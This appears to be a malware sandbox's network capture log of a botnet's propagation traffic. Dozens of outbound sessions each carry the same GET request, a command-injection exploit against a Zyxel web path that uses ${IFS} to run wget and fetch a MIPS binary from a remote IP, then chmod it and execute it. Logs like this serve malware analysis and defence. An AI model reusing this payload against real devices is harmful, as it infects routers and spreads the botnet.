                                            Feb 2, 2024 06:21:09.563982964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3425192.168.2.1550044111.112.1.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564043045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3426192.168.2.1539906219.119.9.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564066887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3427192.168.2.154655435.155.190.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564091921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3428192.168.2.155169219.230.212.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564124107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3429192.168.2.154709696.249.196.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564179897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3430192.168.2.153307847.254.92.201443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564205885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3431192.168.2.15428882.173.168.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564234972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3432192.168.2.1537282165.210.24.203443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564259052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3433192.168.2.155594493.13.149.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564321041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3434192.168.2.1552450171.23.93.181443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564353943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3435192.168.2.1560092187.195.251.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564419031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3436192.168.2.1546294145.221.24.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564456940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3437192.168.2.1558672126.31.238.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564491987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3438192.168.2.1556908125.125.211.103443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564527988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3439192.168.2.1540338170.135.47.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564541101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3440192.168.2.1551890150.132.130.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564585924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3441192.168.2.1542460119.196.9.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564613104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3442192.168.2.1547946216.99.207.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564677954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3443192.168.2.1543594120.186.52.45443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564716101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3444192.168.2.1537584187.194.232.141443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564740896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3445192.168.2.154926899.191.31.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564766884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3446192.168.2.154302072.214.180.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564798117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3447192.168.2.1555520138.179.112.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564851046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3448192.168.2.153366273.83.252.219443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564909935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3449192.168.2.154940273.51.195.65443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564944983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3450192.168.2.1534422173.185.235.122443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.564973116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3451192.168.2.1536280205.74.44.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565015078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3452192.168.2.153455643.18.53.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565043926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3453192.168.2.154316894.84.248.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565083027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3454192.168.2.1537578161.19.61.37443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565109015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3455192.168.2.1539670175.33.151.77443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565164089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3456192.168.2.1555176128.118.14.214443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565196991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3457192.168.2.1558594122.190.255.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565222979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3458192.168.2.153534052.69.100.115443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565263987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3459192.168.2.1559156191.199.5.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565311909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3460192.168.2.1555178144.202.24.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565330982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3461192.168.2.1558300205.233.120.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565387964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3462192.168.2.1554862133.99.151.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565411091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3463192.168.2.1538572165.81.13.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565480947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3464192.168.2.1553654210.56.238.9443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565510988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3465192.168.2.1539272168.0.30.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565557003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3466192.168.2.1551286119.127.59.183443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565598965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3467192.168.2.1549210191.162.239.121443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565632105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3468192.168.2.1558378179.154.31.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565656900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3469192.168.2.154841460.181.136.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565682888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3470192.168.2.1558608113.220.82.160443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565709114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3471192.168.2.154577689.236.58.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565742016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3472192.168.2.153371879.228.34.130443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565749884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3473192.168.2.1557192202.56.141.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565779924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3474192.168.2.155649636.106.192.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565828085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3475192.168.2.1559778165.200.85.190443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565877914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3476192.168.2.1535226161.210.15.249443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565942049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3477192.168.2.153752646.79.10.245443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.565954924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3478192.168.2.153526491.190.196.162443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566009045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3479192.168.2.1546926191.109.112.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566029072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3480192.168.2.1545148155.131.135.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566076994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3481192.168.2.1549938212.191.111.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566104889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3482192.168.2.1534570211.203.179.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566154003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3483192.168.2.1554060140.10.143.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566179991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3484192.168.2.1543916139.166.126.33443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566227913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3485192.168.2.154660251.167.28.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566273928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3486192.168.2.15455722.246.112.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566308022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3487192.168.2.1552414104.253.107.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:09.566343069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3488192.168.2.1533390141.17.94.223443
                                            TimestampBytes transferredDirectionData
